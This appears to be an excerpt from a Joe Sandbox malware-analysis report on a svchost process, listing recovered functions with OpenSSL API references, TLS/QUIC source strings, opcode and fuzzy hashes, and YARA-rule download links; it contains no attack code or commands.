                                                                                            • String ID: ssl\statem\statem_srvr.c$tls_process_client_certificate
                                                                                            • API String ID: 3750526228-3872095317
                                                                                            • Opcode ID: 2245cf865578e7a48e5514ed147dcc870c3e1326ddd966a616d1f47169671059
                                                                                            • Instruction ID: c90cbe8c60b93920a8a55db58fdd7069d10decdb15007597942099b5580db9e8
                                                                                            • Opcode Fuzzy Hash: 2245cf865578e7a48e5514ed147dcc870c3e1326ddd966a616d1f47169671059
                                                                                            • Instruction Fuzzy Hash: 0B22A221B0A78282F750DB65D4602BC27A2FF48784F5CA436DA4DA7797DE3EE581C318
                                                                                            Function 66004CE0 Relevance: 67.8, APIs: 45, Instructions: 321COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 880fcf0aaa95977a11b34ac96da284ab8df0db3b6a86f21f0cf2ac63f8941c71
                                                                                            • Instruction ID: 2ab884b43274ae8bd27f003c0a70cf6485c1be0c11ea69e2ebe3f0b289316fb9
                                                                                            • Opcode Fuzzy Hash: 880fcf0aaa95977a11b34ac96da284ab8df0db3b6a86f21f0cf2ac63f8941c71
                                                                                            • Instruction Fuzzy Hash: F8910262AB9059CBF305D7A89C6936D6F41EB67348FC46E33D90987780EAAECD41C305
                                                                                            Function 660050A0 Relevance: 66.3, APIs: 44, Instructions: 286COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ebf0dfba0df26e46b46dc2b9a221c586dc83cf457bec769d9e91ed8af7c6d6f
                                                                                            • Instruction ID: a81085690ef107ea556ab939f7474760f04922ae039f1ecf93e826bcd2b62937
                                                                                            • Opcode Fuzzy Hash: 7ebf0dfba0df26e46b46dc2b9a221c586dc83cf457bec769d9e91ed8af7c6d6f
                                                                                            • Instruction Fuzzy Hash: B771D57A9AD1154FF216DFE989A83BE6F51EB5734CFC07A32D91A43240DBB8CD818240
                                                                                            Function 6600D5A0 Relevance: 51.3, APIs: 34, Instructions: 280COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: d1a9d616328bb2d58e2b9b2ac429b2c37c5e4b48c5cea1ef9bda06d7f884e913
                                                                                            • Instruction ID: 4071964e9e39717f0edfbfbf1b025a01c2e84b9df4f06fb179bc4b95b9b69bbe
                                                                                            • Opcode Fuzzy Hash: d1a9d616328bb2d58e2b9b2ac429b2c37c5e4b48c5cea1ef9bda06d7f884e913
                                                                                            • Instruction Fuzzy Hash: 34912932A1551A86F700DB98C8943AD7F62F752708FC46A32D61DC33D4EBAADD46C7A0
                                                                                            Function 00007FFDA3638400 Relevance: 49.2, APIs: 6, Strings: 22, Instructions: 168COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFDA3637837,?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA36384C8
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFDA3637837,?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA3638503
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFDA3637837,?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA36385B8
                                                                                            • GetCurrentProcessId.KERNEL32(02000100,00007FFDA3637837,?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA36385F8
                                                                                            • OpenSSL_version.LIBCRYPTO-3-X64(?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA3638655
                                                                                            • BIO_snprintf.LIBCRYPTO-3-X64(?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA3638673
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free$CurrentL_versionO_snprintfOpenProcess
                                                                                            • String ID: 0.3$JSON-SEQ$OpenSSL/%s (%s)$QUIC$client$common_fields$delta$description$group_id$name$process_id$protocol_type$qlog_format$qlog_version$server$ssl\quic\qlog.c$system_info$time_format$title$trace$type$vantage_point
                                                                                            • API String ID: 2463599471-1827591402
                                                                                            • Opcode ID: c519cb3baef21b79d41f78c8beec8676423318cf7b238a91da5a5e575d69bddf
                                                                                            • Instruction ID: 2f2c1e7a5eac90844005cba23759d903a3d80ca752b25cf371553df434009bab
                                                                                            • Opcode Fuzzy Hash: c519cb3baef21b79d41f78c8beec8676423318cf7b238a91da5a5e575d69bddf
                                                                                            • Instruction Fuzzy Hash: 2E812EA0B0E64251F959EB12A2B13FD6363EF857C0F486431DA4E27797DFAEE0058319
                                                                                            Function 66010760 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • (, xrefs: 6601078D
                                                                                            • (+&+:+,+*+0+.+4+2+9+%+'+)+=+>+-+1+++/+3+5+6+7+8+?+"+;+<+$+#+!+e/!/"/#/$/%/&/'/(/)/*/+/,/L/M/N/O/P/Q/R/S/T/U/V/W/X/Y/Z/[/\/]/^/_/`/a/b/c/d/-/.///0/1/2/3/4/5/6/7/8/9/:/;/</=/>/?/@/A/B/C/D/E/F/G/H/I/J/K/!zv,#z|/8z",.z,z#.$.-z%.#,/z1z0z&.>z2z3z6z$,5z4z7zy,(.'.%,z,, xrefs: 660108FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: ($(+&+:+,+*+0+.+4+2+9+%+'+)+=+>+-+1+++/+3+5+6+7+8+?+"+;+<+$+#+!+e/!/"/#/$/%/&/'/(/)/*/+/,/L/M/N/O/P/Q/R/S/T/U/V/W/X/Y/Z/[/\/]/^/_/`/a/b/c/d/-/.///0/1/2/3/4/5/6/7/8/9/:/;/</=/>/?/@/A/B/C/D/E/F/G/H/I/J/K/!zv,#z|/8z",.z,z#.$.-z%.#,/z1z0z&.>z2z3z6z$,5z4z7zy,(.'.%,z,
                                                                                            • API String ID: 4206212132-106588582
                                                                                            • Opcode ID: 41c11e927b261fe9d7886e52c157cd6990bd5bc32e96f99b242d03ceec02bf85
                                                                                            • Instruction ID: a6c50dc65798e8c864702d2a8668b785b3ff8722fc7070365746fa8f8e2465cc
                                                                                            • Opcode Fuzzy Hash: 41c11e927b261fe9d7886e52c157cd6990bd5bc32e96f99b242d03ceec02bf85
                                                                                            • Instruction Fuzzy Hash: 4881B232A2C54A86F600DBD4C46439DBBA2F392348FC45632E18E87250DBB9DD56C7C0
                                                                                            Function 6600E580 Relevance: 45.3, APIs: 30, Instructions: 318COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d34869fc81dd826596a7c468576a77680280a3ac93da3390e048e1171c9a76d1
                                                                                            • Instruction ID: 8bb5db816e21e0249355af8c3a1565cb559f4c0a58edb9989f91a8e6b5780a8e
                                                                                            • Opcode Fuzzy Hash: d34869fc81dd826596a7c468576a77680280a3ac93da3390e048e1171c9a76d1
                                                                                            • Instruction Fuzzy Hash: 5DA1236266858686F320CBA8D85036D3F91EB96348FC05B32E25DE73E0D779DE45CB41
                                                                                            Function 00007FFDA367B370 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 203COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$R_vset_errorX_new_from_pkey
                                                                                            • String ID: $ssl\statem\statem_clnt.c$tls_construct_cke_gost
                                                                                            • API String ID: 3530350984-3523713963
                                                                                            • Opcode ID: c4c2be5d1886bd7c459c428cd5f6cdeec09414fc3d768c4178067a949d798fec
                                                                                            • Instruction ID: d02ad0e0de4e77fba75a2eaf0b040b9c8f7f60347d8b45b653aa93ee3db9a69b
                                                                                            • Opcode Fuzzy Hash: c4c2be5d1886bd7c459c428cd5f6cdeec09414fc3d768c4178067a949d798fec
                                                                                            • Instruction Fuzzy Hash: 04819131B0A68347FA64A722D4717F92752AF89780F882431DE4D67787EF3EE5058708
                                                                                            Function 00007FFDA3607400 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 307COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_sk_value$L_sk_num$L_sk_findL_sk_freememchr
                                                                                            • String ID: $SHA2-256
                                                                                            • API String ID: 2914672735-3630060591
                                                                                            • Opcode ID: 197518af10299bf8c513597842f17972a24b38605a6898080e2796ef2e9e21dd
                                                                                            • Instruction ID: b601632697726b3dc8c6eeb621e999a2cbf5826787adca6c50159f48d810da3e
                                                                                            • Opcode Fuzzy Hash: 197518af10299bf8c513597842f17972a24b38605a6898080e2796ef2e9e21dd
                                                                                            • Instruction Fuzzy Hash: F2C1B421B0A64242FB659A2691623F92792EF47BC5F0CA035DE0E67787DE3EE4418748
                                                                                            Function 660121B0 Relevance: 33.6, APIs: 17, Strings: 2, Instructions: 358COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: %"$~
                                                                                            • API String ID: 4206212132-3409227523
                                                                                            • Opcode ID: 357b63396c3512d4b18d125c3f3fed3988ec2f5c2de7e57da0e7c3bada520e8b
                                                                                            • Instruction ID: 3e8c679f720ea173282e1251cf057b69790f8985ad419b173015c1842cc6ff2b
                                                                                            • Opcode Fuzzy Hash: 357b63396c3512d4b18d125c3f3fed3988ec2f5c2de7e57da0e7c3bada520e8b
                                                                                            • Instruction Fuzzy Hash: 48D11572B1855A96F700CB98D89479CBBA2F393748FC04632D60DC7394D76ADD9ACB80
                                                                                            Function 00007FFDA362D440 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 126COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D4C1
                                                                                            • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D4DE
                                                                                            • OBJ_txt2nid.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D50C
                                                                                            • CONF_parse_list.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D55B
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D56E
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D586
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D59D
                                                                                            • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D5C4
                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D5DC
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D5F7
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D610
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free$F_parse_listJ_txt2nidO_mallocO_zallocR_newR_set_debugR_set_errormemcpy
                                                                                            • String ID: No valid signature algorithms in '%s'$ssl\t1_lib.c$tls1_set_sigalgs_list
                                                                                            • API String ID: 2783265381-2346630447
                                                                                            • Opcode ID: 9605a27f74ca95cfa6e2d663d6db4e625902f1c2617fdcc21c395bcbd9764aa3
                                                                                            • Instruction ID: b74356fae3c2a62df541cc41a7ff686ceb400b027b478a141848f99f6fd03862
                                                                                            • Opcode Fuzzy Hash: 9605a27f74ca95cfa6e2d663d6db4e625902f1c2617fdcc21c395bcbd9764aa3
                                                                                            • Instruction Fuzzy Hash: 1651C722B06B4286FB50DF51E8602B96392FF49B84F492032DE4D67B96DF3EE011C305
                                                                                            Function 00007FFDA3685360 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_new$O_freeR_set_debugi2d_
                                                                                            • String ID: ssl\statem\statem_lib.c$tls_output_rpk
                                                                                            • API String ID: 1734496139-3340282326
                                                                                            • Opcode ID: 0434b11e71eeb1a927023dbb3a43dede19d7183b6f75b271aff535cf7599750a
                                                                                            • Instruction ID: 85c77f498cb3895a3da5c48862ce7d33c6dc80bdc54e3df39c3051b24dde5128
                                                                                            • Opcode Fuzzy Hash: 0434b11e71eeb1a927023dbb3a43dede19d7183b6f75b271aff535cf7599750a
                                                                                            • Instruction Fuzzy Hash: 8351C321B0F64283FB10DA1798707BD66439F89B84F0C6031EA4DA77C7DE6EE541871A
                                                                                            Function 00007FFDA36F4B70 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 88stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ByteCharInfoLocaleMultiWidememsetstrspn
                                                                                            • String ID: 0123456789$CP%s$CP%u$U$utf8
                                                                                            • API String ID: 3896320244-1747673053
                                                                                            • Opcode ID: c69ca0f0c0ce6d2260eeb5b107b055d132123da6641f26da8d9d6cc1127de9c5
                                                                                            • Instruction ID: b71aec450234e2fa15d4d5a36f23dc0e944ce4bcce1ac0b46d850451b93aef24
                                                                                            • Opcode Fuzzy Hash: c69ca0f0c0ce6d2260eeb5b107b055d132123da6641f26da8d9d6cc1127de9c5
                                                                                            • Instruction Fuzzy Hash: AD41D63170F68681FB218B15E4313B567A2EF4AB84F4CA035DA5E27B97DE3EE4058704
                                                                                            Function 00007FFDA3671430 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$R_vset_error
                                                                                            • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_server_name
                                                                                            • API String ID: 4275876640-3375710298
                                                                                            • Opcode ID: 8d7a682abe7cb507a9198a9a24b66b76ecc5ec11f53184df7939f1f6f3d6db20
                                                                                            • Instruction ID: bb85b125f0cd19ad741aa4b6fbae5dca2c9cadee50f6c75c176538e2f2a8a7b9
                                                                                            • Opcode Fuzzy Hash: 8d7a682abe7cb507a9198a9a24b66b76ecc5ec11f53184df7939f1f6f3d6db20
                                                                                            • Instruction Fuzzy Hash: C8319E71F0A58287F7919B61D8A17F92262DF88744F8C2832C90C96793DF6EE5C68718
                                                                                            Function 00007FFDA368844C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$O_freeO_memdupR_vset_error
                                                                                            • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\statem\statem_srvr.c$tls_process_next_proto
                                                                                            • API String ID: 464498836-56982555
                                                                                            • Opcode ID: 63642cc689758fb4ec4ee4fe9c4727acf58d27852583a43ad9a713bda0192c09
                                                                                            • Instruction ID: 714758172d98901b95d43457c36bfae24d8acbf33103a4f30db0a7e56fdf4c59
                                                                                            • Opcode Fuzzy Hash: 63642cc689758fb4ec4ee4fe9c4727acf58d27852583a43ad9a713bda0192c09
                                                                                            • Instruction Fuzzy Hash: 3541D122F0EBC182F7109B15E4602F9A3A1FB99784F4C5231EA8C67B57DF2DE5918704
                                                                                            Function 00007FFDA36F6F94 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
